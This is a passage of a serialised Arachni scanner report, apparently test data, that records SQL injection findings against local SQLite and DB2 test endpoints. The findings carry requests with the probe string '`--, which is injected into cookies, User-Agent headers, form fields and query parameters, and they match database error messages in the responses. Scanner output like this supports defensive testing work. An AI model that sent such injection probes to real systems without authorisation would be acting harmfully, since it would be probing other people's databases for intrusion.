        Server: thin 1.4.1 codename Chromeo
    id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"]
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Warning.*sqlite_.*)
      :match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"]
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/sqlite/cookie/flip
      :verification: false
      :id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"]
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Warning.*sqlite_.*)
    regexp_match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"]
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, \"Warning stuff sqlite_\\nSQLite/JDBCDriver\\nSQLite.Exception\\nSystem.Data.SQLite.SQLiteException\\n\"]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/sqlite/cookie/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/sqlite/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value'`--
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "92"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Warning stuff sqlite_
    injected: cookie value'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Warning.*sqlite_.*)
      :match: Warning stuff sqlite_
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value'`--
      :injected: cookie value'`--
      :combo: 
        cookie2: cookie value'`--
      :action: http://localhost:7842/sqlite/cookie/append
      :verification: false
      :id: Warning stuff sqlite_
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Warning.*sqlite_.*)
    regexp_match: Warning stuff sqlite_
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      Warning stuff sqlite_
      SQLite/JDBCDriver
      SQLite.Exception
      System.Data.SQLite.SQLiteException

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/sqlite/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/sqlite/header/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "255"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Warning.*sqlite_.*)
      :match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/sqlite/header/flip
      :verification: false
      :id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Warning.*sqlite_.*)
    regexp_match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, \"Warning stuff sqlite_\\nSQLite/JDBCDriver\\nSQLite.Exception\\nSystem.Data.SQLite.SQLiteException\\n\", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/sqlite/header/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/sqlite/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'`--
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "92"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Warning stuff sqlite_
    injected: arachni_user'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Warning.*sqlite_.*)
      :match: Warning stuff sqlite_
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'`--
      :injected: arachni_user'`--
      :combo: 
        User-Agent: arachni_user'`--
      :action: http://localhost:7842/sqlite/header/append
      :verification: false
      :id: Warning stuff sqlite_
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Warning.*sqlite_.*)
    regexp_match: Warning stuff sqlite_
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      Warning stuff sqlite_
      SQLite/JDBCDriver
      SQLite.Exception
      System.Data.SQLite.SQLiteException

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/sqlite/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/db2/form/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "91"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "DB2 SQL error:"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:DB2 SQL error:)
      :match: "DB2 SQL error:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: form
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/db2/form/flip
      :verification: false
      :id: "DB2 SQL error:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:DB2 SQL error:)
    regexp_match: "DB2 SQL error:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"DB2 SQL error:\\n[IBM][CLI Driver][DB2/6000]\\nCLI Driver stuff DB2\\nDB2 SQL error\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/db2/form/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/db2/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "78"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "DB2 SQL error:"
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:DB2 SQL error:)
      :match: "DB2 SQL error:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: form
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/db2/form/append
      :verification: false
      :id: "DB2 SQL error:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:DB2 SQL error:)
    regexp_match: "DB2 SQL error:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      DB2 SQL error:
      [IBM][CLI Driver][DB2/6000]
      CLI Driver stuff DB2
      DB2 SQL error

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/db2/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/db2/link/flip?input=default
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "91"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "DB2 SQL error:"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:DB2 SQL error:)
      :match: "DB2 SQL error:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: link
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/db2/link/flip?input=default
      :verification: false
      :id: "DB2 SQL error:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:DB2 SQL error:)
    regexp_match: "DB2 SQL error:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"DB2 SQL error:\\n[IBM][CLI Driver][DB2/6000]\\nCLI Driver stuff DB2\\nDB2 SQL error\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/db2/link/flip?input=default
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/db2/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "78"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "DB2 SQL error:"
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:DB2 SQL error:)
      :match: "DB2 SQL error:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: link
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/db2/link/append?input=default
      :verification: false
      :id: "DB2 SQL error:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:DB2 SQL error:)
    regexp_match: "DB2 SQL error:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      DB2 SQL error:
      [IBM][CLI Driver][DB2/6000]
      CLI Driver stuff DB2
      DB2 SQL error

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/db2/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/db2/cookie/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value;'`--=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "91"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "DB2 SQL error:"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:DB2 SQL error:)
      :match: "DB2 SQL error:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/db2/cookie/flip
      :verification: false
      :id: "DB2 SQL error:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:DB2 SQL error:)
    regexp_match: "DB2 SQL error:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, \"DB2 SQL error:\\n[IBM][CLI Driver][DB2/6000]\\nCLI Driver stuff DB2\\nDB2 SQL error\\n\"]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/db2/cookie/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/db2/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value'`--
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "78"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "DB2 SQL error:"
    injected: cookie value'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:DB2 SQL error:)
      :match: "DB2 SQL error:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value'`--
      :injected: cookie value'`--
      :combo: 
        cookie2: cookie value'`--
      :action: http://localhost:7842/db2/cookie/append
      :verification: false
      :id: "DB2 SQL error:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:DB2 SQL error:)
    regexp_match: "DB2 SQL error:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      DB2 SQL error:
      [IBM][CLI Driver][DB2/6000]
      CLI Driver stuff DB2
      DB2 SQL error

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/db2/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
